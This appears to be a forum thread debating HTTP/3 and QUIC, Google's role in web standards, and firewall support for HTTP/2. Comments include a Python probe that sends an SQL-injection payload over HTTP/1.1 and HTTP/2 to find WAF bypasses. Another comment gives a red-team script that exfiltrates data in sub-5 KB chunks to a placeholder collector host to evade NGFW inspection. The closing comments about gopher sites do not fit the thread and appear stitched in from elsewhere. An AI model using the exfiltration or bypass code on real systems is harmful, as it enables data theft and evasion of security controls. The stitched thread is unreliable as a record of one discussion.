1. 15

    Q: is the HTTP protocol really the problem that needs fixing?

    My belief is that if HTTP overhead is causing you issues, there are many alternative ways to fix it that don’t require more complexity. A site doesn’t load slowly because of HTTP; it loads slowly because it’s poorly designed in other ways.

    I’m also suspicious of Google’s involvement. HTTP/1.1 over TCP is very simple to debug and do by hand. Google seems to like closing or controlling open things (Google Chat dropping XMPP support, Google AMP, etc.). Extra complexity is something that should be avoided, especially for the open web.
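
    For what it’s worth, here’s a minimal sketch of what “by hand” can look like: a plain Python socket speaking HTTP/1.1 to a placeholder host (example.com); both the request and the response headers are ordinary readable text.

      # Minimal sketch: speaking HTTP/1.1 "by hand" over a raw TCP socket.
      # example.com is only a placeholder host.
      import socket

      HOST = "example.com"
      request = (
          "GET / HTTP/1.1\r\n"
          f"Host: {HOST}\r\n"
          "Connection: close\r\n"
          "\r\n"
      )

      with socket.create_connection((HOST, 80)) as sock:
          sock.sendall(request.encode("ascii"))
          response = b""
          while chunk := sock.recv(4096):
              response += chunk

      # The status line and headers come back as plain, human-readable text.
      print(response.split(b"\r\n\r\n", 1)[0].decode("ascii", "replace"))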

    1. 10

      They have to do the fix on HTTP because massive ecosystems already depend on HTTP and on browsers with no intent to switch. There are billions of dollars riding on staying on that gravy train, too. It’s also worth noting that lots of firewalls in big companies let HTTP traffic through but not better-designed protocols. The low-friction improvements get more uptake from IT departments.

      1. 7

        WAFs and the like barely support HTTP/2 tho; a friend gave a whole talk on bypasses and scanning for it, for example

        1. 6

          Thanks for the feedback. I’m skimming the talk’s slides right now. So far, it looks like HTTP/2 got big adoption but WAFs lagged behind. Probably just riding their cash cows while minimizing further investment. I’m also sensing a business opportunity if anyone wants to build an HTTP/2 and /3 WAF that actually works, with independent testing showing that nothing else does. Might help bootstrap the company.

          1. 3

            ja, that’s exactly correct: lots of the big-name WAFs/NGFWs/&c. are missing support for HTTP/2 but many of the mainline servers support it, so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.

            I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…
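
            As a rough sketch of how someone might check this kind of gap themselves (assuming the httpx library with its optional HTTP/2 support installed, and a test target they’re authorized to probe; both are placeholders here): send the same suspicious-looking parameter over HTTP/1.1 and HTTP/2 and see whether whatever sits in front reacts differently.

              # Sketch: send the same SQLi-looking payload over HTTP/1.1 and
              # HTTP/2 and compare how whatever sits in front of the target
              # reacts. TARGET is a placeholder; only probe systems you are
              # authorized to test. Requires: pip install "httpx[http2]"
              import httpx

              TARGET = "https://test-target.example/search"  # hypothetical host
              PAYLOAD = {"q": "1' OR '1'='1"}                 # classic SQLi probe

              for use_http2 in (False, True):
                  with httpx.Client(http2=use_http2) as client:
                      r = client.get(TARGET, params=PAYLOAD)
                      print(f"http2={use_http2} negotiated={r.http_version} "
                            f"status={r.status_code}")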

            1. 4

              “so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.”

              Unbelievable… That shit is why I’m not in the security industry. People are mostly building and buying bullshit. There are exceptions, but they’re usually set up to sell out later. Products based on dual-licensed code are about the only thing immune to vendor risk. Seemingly. Still exploring hybrid models to root out this kind of BS or force it to change faster.

              “I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…”

              Experiment however you like. I can’t imagine whatever you release being less effective than web firewalls that can’t even parse the web protocols. Haha.

              1. 5

                “Products based on dual-licensed code”

                We do this where I work, and it’s pretty nice, tho of course we have certain things that are completely closed source. We have a few competitors that use our products, so it’s been an interesting ecosystem to dive into for me…

                “Experiment however you like. I can’t imagine whatever you release being less effective than web firewalls that can’t even parse the web protocols. Haha.”

                pfff… there’s an “NGFW” vendor I know that…

                • when it sees a connection it doesn’t know, it analyzes the first 5k bytes
                • the connection is allowed to continue until the 5k+1st byte arrives
                • subsequently, if your exfiltration process transfers data in chunks of <= 5kB, you’re OK (sketched below)!

                we found this during an adversary simulation assessment (“red team”), and I think it’s one of the most asinine things I’ve seen in a while. The vendor closed it as “works as expected”.

                edit: fixed the work link, as that’s a known issue.
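
                To make the “sketched below” bit concrete, this is roughly what the bypass amounts to; the collector URL is purely hypothetical, and the requests library is just an assumption for illustration:

                  # Sketch of why the 5k limit is meaningless: ship data out in
                  # chunks below the appliance's inspection window, one fresh
                  # connection per chunk. COLLECTOR_URL is a hypothetical
                  # endpoint; illustrative, for authorized red-team use only.
                  import requests

                  COLLECTOR_URL = "https://collector.example/upload"  # placeholder
                  CHUNK_SIZE = 4096                                   # stays under 5kB

                  def exfiltrate(data: bytes) -> None:
                      for offset in range(0, len(data), CHUNK_SIZE):
                          chunk = data[offset:offset + CHUNK_SIZE]
                          # Each call opens its own connection, so no single
                          # connection ever reaches the 5k+1st byte.
                          requests.post(COLLECTOR_URL, data=chunk, timeout=10)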

                1. 3

                  BTW, Firefox complains when I go to https://trailofbits.com/ that the cert isn’t configured properly…
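
                  (If it helps to narrow it down, here’s a generic way to look at what the server actually serves, using only Python’s standard library; this is just a quick check, not a diagnosis.)

                    # Quick check: what certificate does the host present, and does
                    # default verification accept it? A failure here is roughly what
                    # the browser warns about (wrong name, expiry, or a missing
                    # intermediate).
                    import socket
                    import ssl

                    HOST = "trailofbits.com"
                    ctx = ssl.create_default_context()

                    with socket.create_connection((HOST, 443)) as tcp:
                        try:
                            with ctx.wrap_socket(tcp, server_hostname=HOST) as tls:
                                cert = tls.getpeercert()
                                print("subject:", cert.get("subject"))
                                print("subjectAltName:", cert.get("subjectAltName"))
                                print("notAfter:", cert.get("notAfter"))
                        except ssl.SSLCertVerificationError as err:
                            print("verification failed:", err)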

                  1. 2

                    hahaha Nick and I were just talking about that; it’s been reported before, I’ll kick it up the chain again. Thanks for that! I should probably edit my post for that…

                    1. 2

                      Adding another data point: latest iOS also complains about the cert

        2. 3

          “They have to do the fix on HTTP”

          What ‘fix’? Will this benefit anyone other than Google?

          I’m concerned that if this standard is not actually a worthwhile improvement for everyone else, then it won’t be adopted and the IETF will lose respect. I’m running on the guess that it’s going to have even less adoption than HTTP/2.

        3. 13

          I understand and sympathize with your criticism of Google, but it seems misplaced here. This isn’t happening behind closed doors. The IETF is an open forum.

          1. 6

            Just because they do some subset of the decision-making in the open doesn’t mean they should be exempt from blame.

            1. 3

              Feels like Google’s turned a lot of public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.

              1. 5

                Any browser vendor can ship whatever they want if they think it makes them more attractive to users or whatnot. That doesn’t mean it’s a standard. WebUSB shipped in Chrome (and only in Chrome) more than a year ago. The WebUSB spec is still an Editor’s Draft and seems unlikely to advance significantly along the standards track.

                The problem is not with the standards bodies, but with user choice, market incentive, blah blah.

                1. 3

                  “Feels like Google’s turned a lot of public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.”

                  “WebUSB”? It’s like kuru crossed with ebola. Where do I get off this train.

                2. 2

                  Google is incapable of doing bad things in an open forum? Open forums cannot be influenced in bad ways?

                  This does not dispel my concerns :/ What do you mean exactly?

                  1. 4

                    If the majority of the IETF HTTP WG agrees, I find it rather unlikely that this is going according to some grand plan toward “closed things”.

                    Your “things becoming closed-access” argument doesn’t hold, imho. While I have done lots of plain-text debugging for HTTP, SMTP, POP and IRC, I can’t agree that it’s a strong argument: whenever debugging gets serious, I go back to writing a script anyway. Also, I really want the web to become encrypted by default (HTTPS), so we need “plain text for easy debugging” to go away. The web needs to be great (secure, private, etc.) for users first, engineers second.
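
                    (For what it’s worth, this is the kind of throwaway script I mean; the client library handles the TLS, and you still get everything you’d want to eyeball. The requests library and example.com are just placeholders here.)

                      # Sketch of "go back to writing a script": even over HTTPS the
                      # library exposes everything you would normally eyeball by hand.
                      # example.com is a placeholder.
                      import requests

                      r = requests.get("https://example.com/", timeout=10)
                      print("sent:", dict(r.request.headers))
                      print("got :", r.status_code, dict(r.headers))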

                    1. 2

                      That “users first, engineers second” mantra leads to things like Apple and Microsoft clamping down on the “general purpose computer”: think of the children, er, the users! They can’t protect themselves. We’re facing this at work (“the network and computers need to be secure, private, etc.”) and it’s expected we won’t be able to do any development, because of course upper management doesn’t trust us mere engineers with “general purpose computers”. Why can’t it be for everybody, engineers included?

                      1. 1

                        No, no, you misunderstand.

                        The “users first / engineers second” point is not about engineers as end users, as in your desktop computer example.

                        What I mean derives from the W3C design principles. That is to say, we shouldn’t avoid significant positive change (e.g., HTTPS over HTTP) just because it’s a bit harder on the engineering end.

                        1. 6

                          Define “positive change.” Google shoved HTTP/2 down our throats because it serves their interests, not ours. Google is shoving QUIC down our throats because, again, it serves their interests, not ours. That it coincides with your biases is good for you; others might feel differently. What “positive change” does running TCP over TCP give us (HTTP/2)? What “positive change” does a reimplementation of SCTP give us (QUIC)? I mean, other than NIH syndrome?

                          1. 3

                            Are you asking how QUIC and H2 work, or are you saying performance isn’t worth improving? If it’s the latter, I think we’ve figured out why we disagree here. If it’s the former, I kindly ask you to find out for yourself before you enter this dispute.

                            1. 3

                              I know how they work. I’m asking, why are they reimplementing already implemented concepts? I’m sorry, but TCP over TCP (aka HTTP/2) is plain stupid—one lost packet and every stream on that connection hits a brick wall.

                              1. 1

                                SPDY and its descendants are designed to allow web pages with lots of resources (namely, images, stylesheets, and scripts) to load quickly. A sizable number of people think that web pages should just not have lots of resources.

                1. 5

                  A great write-up! I’ve also been collecting tutorials and guides for aspiring gopher content creators. You can find them over at https://gopher.zone

                  1. 3

                    That’s so cool! Although deep down I know it probably won’t, I’d love for Gopher to make a comeback (where comeback is “more software understands gopher://”).

                    Will you be providing links to the other articles up at gopher://sdf.org:70/1/sdf/faq/GOPHER as well?

                    1. 3

                      There’s a small but thriving phlogging community on gopher.